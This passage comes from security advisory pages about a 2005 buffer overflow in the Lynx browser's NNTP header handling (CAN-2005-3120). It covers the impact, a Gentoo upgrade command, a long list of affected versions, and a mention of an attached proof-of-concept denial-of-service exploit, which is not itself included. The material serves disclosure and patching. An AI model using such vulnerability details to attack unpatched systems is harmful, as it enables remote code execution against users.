information about the available articles in the target newsgroup. Ulf
Harnhammar discovered a buffer overflow in a function that handles the
escaping of special characters.

Impact
======

An attacker could setup a malicious NNTP server and entice a user to
access it using Lynx (either by creating NNTP links on a web page or by
forcing a redirect for Lynx users). The data returned by the NNTP
server would trigger the buffer overflow and execute arbitrary code
with the rights of the user running Lynx.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Lynx users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/lynx-2.8.5-r1"

References
==========

  [ 1 ] CAN-2005-3120
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3120

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-15.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

- Vulnerability information

20019
Lynx NNTP HTrjis() Function Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-10-17 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Lynx NNTP Article Header Buffer Overflow Vulnerability
Boundary Condition Error  BID 15117
Remote: Yes  Local: No
2005-10-17 12:00:00 (published)  2006-11-28 05:35:00 (updated)
Discovery is credited to Ulf Harnhammar.

- Affected program versions

University of Kansas Lynx 2.8.6 dev9
University of Kansas Lynx 2.8.6 dev8
University of Kansas Lynx 2.8.6 dev7
University of Kansas Lynx 2.8.6 dev6
University of Kansas Lynx 2.8.6 dev5
University of Kansas Lynx 2.8.6 dev4
University of Kansas Lynx 2.8.6 dev3
University of Kansas Lynx 2.8.6 dev2
University of Kansas Lynx 2.8.6 dev13
University of Kansas Lynx 2.8.6 dev12
University of Kansas Lynx 2.8.6 dev11
University of Kansas Lynx 2.8.6 dev10
University of Kansas Lynx 2.8.6 dev1
University of Kansas Lynx 2.8.5 dev.8
+ MandrakeSoft Multi Network Firewall 2.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
University of Kansas Lynx 2.8.5 dev.5
University of Kansas Lynx 2.8.5 dev.4
University of Kansas Lynx 2.8.5 dev.3
University of Kansas Lynx 2.8.5 dev.2
University of Kansas Lynx 2.8.5
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 2006.0 x86_64
+ Mandriva Linux Mandrake 2006.0
+ Mandriva Linux Mandrake 10.2 x86_64
+ Mandriva Linux Mandrake 10.2
+ Mandriva Linux Mandrake 10.1 x86_64
+ Mandriva Linux Mandrake 10.1
+ Ubuntu Ubuntu Linux 5.10 powerpc
+ Ubuntu Ubuntu Linux 5.10 i386
+ Ubuntu Ubuntu Linux 5.10 amd64
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
University of Kansas Lynx 2.8.4 rel.1
University of Kansas Lynx 2.8.4
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Debian Linux 3.0
+ RedHat Linux for iSeries 7.1
+ RedHat Linux for pSeries 7.1
+ Sun Linux 5.0.6
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
University of Kansas Lynx 2.8.3 rel.1
University of Kansas Lynx 2.8.3 pre.5
University of Kansas Lynx 2.8.3 dev2x
University of Kansas Lynx 2.8.3 dev.22
University of Kansas Lynx 2.8.3
+ Debian Linux 2.2
University of Kansas Lynx 2.8.2 rel.1
University of Kansas Lynx 2.8.1
University of Kansas Lynx 2.8
University of Kansas Lynx 2.7
Trustix Secure Linux 3.0
Trustix Secure Linux 2.2
Trustix Secure Enterprise Linux 2.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
Slackware Linux 10.2
Slackware Linux 10.1
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux -current
SGI Advanced Linux Environment 3.0
SCO Unixware 7.1.4
SCO Unixware 7.1.3
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1
RedHat Desktop 4.0
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
Red Hat Fedora Core4
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1
OpenPKG OpenPKG 2.5
OpenPKG OpenPKG 2.4
OpenPKG OpenPKG 2.3
OpenPKG OpenPKG Current
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0
Conectiva Linux 10.0
Avaya S8710 R2.0.1
Avaya S8710 R2.0.0
Avaya S8700 R2.0.1
Avaya S8700 R2.0.0
Avaya S8500 R2.0.1
Avaya S8500 R2.0.0
Avaya S8300 R2.0.1
Avaya S8300 R2.0.0

- Unaffected program versions

University of Kansas Lynx 2.8.6 dev14

- Vulnerability discussion

Lynx is prone to a buffer overflow when handling NNTP article headers.

This issue may be exploited when the browser handles NNTP content, such as through 'news:' or 'nntp:' URIs. Successful exploitation will result in code execution in the context of the program user.

- Exploit

A proof-of-concept, denial-of-service exploit is included in the attached 'lynx-data.zip' file:

- Solution

Please see the attached advisories for details on obtaining and applying fixes.

Conectiva Linux 10.0
University of Kansas Lynx 2.8.2 rel.1
University of Kansas Lynx 2.8.3 dev2x
University of Kansas Lynx 2.8.3 dev.22
University of Kansas Lynx 2.8.3 rel.1
University of Kansas Lynx 2.8.3 pre.5
University of Kansas Lynx 2.8.3
University of Kansas Lynx 2.8.4
University of Kansas Lynx 2.8.4 rel.1
University of Kansas Lynx 2.8.5 dev.5
University of Kansas Lynx 2.8.5 dev.4
University of Kansas Lynx 2.8.5
University of Kansas Lynx 2.8.5 dev.3
University of Kansas Lynx 2.8.5 dev.8
University of Kansas Lynx 2.8.6 dev4
University of Kansas Lynx 2.8.6 dev1
University of Kansas Lynx 2.8.6 dev10
University of Kansas Lynx 2.8.6 dev8
University of Kansas Lynx 2.8.6 dev6
University of Kansas Lynx 2.8.6 dev11
University of Kansas Lynx 2.8.6 dev3
University of Kansas Lynx 2.8.6 dev2
SCO Unixware 7.1.4
